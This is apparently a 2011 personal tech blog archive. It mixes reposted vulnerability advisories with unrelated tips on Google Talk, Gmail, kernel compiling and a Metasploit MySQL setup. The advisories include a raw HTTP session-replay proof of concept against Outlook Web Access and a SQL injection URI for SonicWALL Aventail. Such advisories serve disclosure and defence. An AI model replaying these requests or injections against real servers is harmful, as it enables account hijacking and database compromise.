Tuesday, November 22, 2011

Microsoft Outlook Web Access Session Replay Security Bypass Vulnerability

Detail of POC can be viewed
http://www.securityfocus.com/bid/50361

Microsoft Outlook Web Access is prone to a security-bypass vulnerability.

Successful exploits may allow attackers to hijack web sessions or bypass authentication through a replay attack and gain access to a victim's email account.

Microsoft Outlook Web Access 8.2.254.0 is vulnerable; other versions may also be affected.

An attacker can carry out this attack using readily available network utilities.

The following proof of concept is available:

GET /owa/?ae=Folder&t=IPF.Note&a= HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application,
application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, application/x-mfe-ipt,
*/*
Referer: https://www.example.com/owa/
Accept-Language: en-in
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR
3.5.30729; FDM; .NET CLR 3.0.30729; .NET4.0C)
Accept-Encoding: gzip, deflate
Host: xxxwebmail.xxx.xxx
Connection: Keep-Alive
Cookie: sessionid=49307edc-0f26-4dae-95f8-02d3dc6ad8a3:000;
cadata="25HxHgvnciGT/BOV1+yiA+HThFiE6kBtFXSjqAF0B5vvPAIKu7PA8tzKUCnW9N4Ao9E1WSzUeA27dLBgx";
UserContext=e8997d6036554ada88a62dc9f2cf65d3

SonicWALL Aventail 'CategoryID' Parameter SQL Injection Vulnerability

Detail of POC can be viewed
http://www.securityfocus.com/bid/50702
http://www.exploit-db.com/exploits/18122/

SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.


Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/prodpage.cfm?CFID=&CFTOKEN=&CategoryID=[SQL]

Sunday, September 11, 2011

Turning Firefox to an Ethical Hacking Platform

Information gathering

Whois and geo-location
ShowIP : Show the IP address of the current page in the status bar. It also allows querying custom services by IP (right mouse button) and Hostname (left mouse button), like whois, netcraft.

Shazou : The product called Shazou (pronounced Shazoo it is Japanese for mapping) enables the user with one-click to map and geo-locate any website they are currently viewing.

HostIP.info Geolocation : Displays Geolocation information for a website using hostip.info data. Works with all versions of Firefox.

Active Whois : Starting Active Whois to get details about any Web site owner and its host server.
Bibirmer Toolbar : An all-in-one extension. But auditors need to play with the toolbox. It includes ( WhoIs, DNS Report, Geolocation , Traceroute , Ping ). Very useful for information gathering phase

Enumeration / fingerprinting
Header Spy: Shows HTTP headers on statusbar
Header Monitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

Social engineering
People Search and Public Record: This Firefox extension is a handy menu tool for investigators, reporters, legal professionals, real estate agents, online researchers and anyone interested in doing their own basic people searches and public record lookups as well as background research.

Googling and spidering
Advanced dork : Gives quick access to Google’s Advanced Operators directly from the context menu. This could be used to scan for hidden files or narrow in a target anonymously (via the scroogle.org option) [Updated Definition. Thanks to CP author of Advanced Dork]

SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack from www.httrack.com.

View Dependencies : View Dependencies adds a tab to the "page info" window, in which it lists all the files which were loaded to show the current page. (useful for a spidering technique)

Sunday, May 22, 2011

Running Multiple Instances of Google Talk

Open Multiple Gtalk Instances
First find out where your GTalk is installed. This would usually be:

C:\Program Files\Google\Google Talk\googletalk.exe

Once you have found out where your Google Talk is,
• create a short cut by right clicking on your desktop and choosing Shortcut
• Browse and choose the location of the file and add “/nomutex” in the end of the location. So your path looks like this
“C:\Program%20Files\Google\Google%20Talk\googletalk.exe” /nomutex


That’s it. Now click on your usual link to open GTalk. After you open it, log into it. Now click on the new shortcut that you created to open the second Google Talk.

Backtrack db_driver mysql problem Error

Backtrack db_driver mysql problem Error
solution

1)# apt-get install libmysqlclient-dev

2) # start mysql or #/etc/init.d/mysql start

3)# mysql -u root -p'toor' by default password is toor

4)mysql> create database metasploit3; // mysql> create database ;

6)mysql> grant all privileges on metasploit3.* to root@localhost;
mysql> exit


7)# update-alternatives --config ruby //

after choose type selection number: 0

8)# ruby -v //check ruby version it should be ruby 1.8.7

9)#gem install mysql

10)# ruby1.8 /pentest/exploits/framework3/msfconsole // it should be starting with ruby1.8 every u open msfconsole

11)msf > db_driver mysql

12)msf > db_connect root:toor@127.0.0.1:3306/metasploit3

13)msf > db_status

14)msf > db_nmap -sS -n 192.168.1.2 // check it working or not

cheer!!!!















Wednesday, April 27, 2011

Insert Images into Your Gmail Messages

Well, it's around 3am . one of my frd asked how to insert image in gmail  

Solution: To put images into your messages or attach images  want to inline them. Just turn on "Inserting images" from the Labs tab under Settings



Make sure you're in rich formatting mode, or it won't show up. Click the little image icon, and you can insert images in two ways: by uploading image files from your computer or providing image URLs.

Gmail doesn't show URL-based images in messages by default to protect you from spammers, so if you're sending mail to other Gmail users, they'll still have to click "Display images below" or "Always display images from ..." to see images you embed.

Tuesday, February 15, 2011

Compile Linux kernel 2.6

Step # 1 Get Latest Linux kernel code

Visit http://kernel.org/ and download the latest source code. File name would be linux-x.y.z.tar.bz2, where x.y.z is actual version number.

root@asheesh#cd /tmp
root@asheesh#wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-x.y.z.tar.bz2


Step # 2 Extract tar (.tar.bz2) file

root@asheesh# tar -xjvf linux-2.6.25.tar.bz2 -C /usr/src
root@asheesh# cd /usr/src


Step # 3 Configure kernel
root@asheesh# apt-get install gcc (if gcc is not installed)
root@asheesh#make menuconfig

Step # 4 Compile kernel

Start compiling to create a compressed kernel image
root@asheesh# make

Start compiling to kernel modules:
root@asheesh# make modules
root@asheesh#make modules_install

Step # 5 Install kernel

Compiled kernel and installed kernel modules.
root@asheesh#make install

Step # 6: Create an initrd image

Type the following command at a shell prompt:
root@asheesh# cd /boot
root@asheesh# mkinitrd -o initrd.img-2.6.37 2.6.37


Step # 7 Modify Grub configuration file

- /boot/grub/menu.lst (before Edit Please take backup)

Open file using vi or gedit:
root@asheesh# vi /boot/grub/menu.lst

title Debian GNU/Linux, kernel 2.6.25 Default
root (hd0,0)
kernel /boot/vmlinuz root=/dev/hdb1 ro
initrd /boot/initrd.img-2.6.25
savedefault
boot



Remember to setup correct root=/dev/hdXX device. Save and close the file. If you think editing and writing all lines by hand 
is too much for you, try out update-grub command to update the lines for each kernel in /boot/grub/menu.lst file. Just type 

the command:
root@asheesh#update-grub



Step # 8 : Reboot computer and boot into your new kernel

root@asheesh# reboot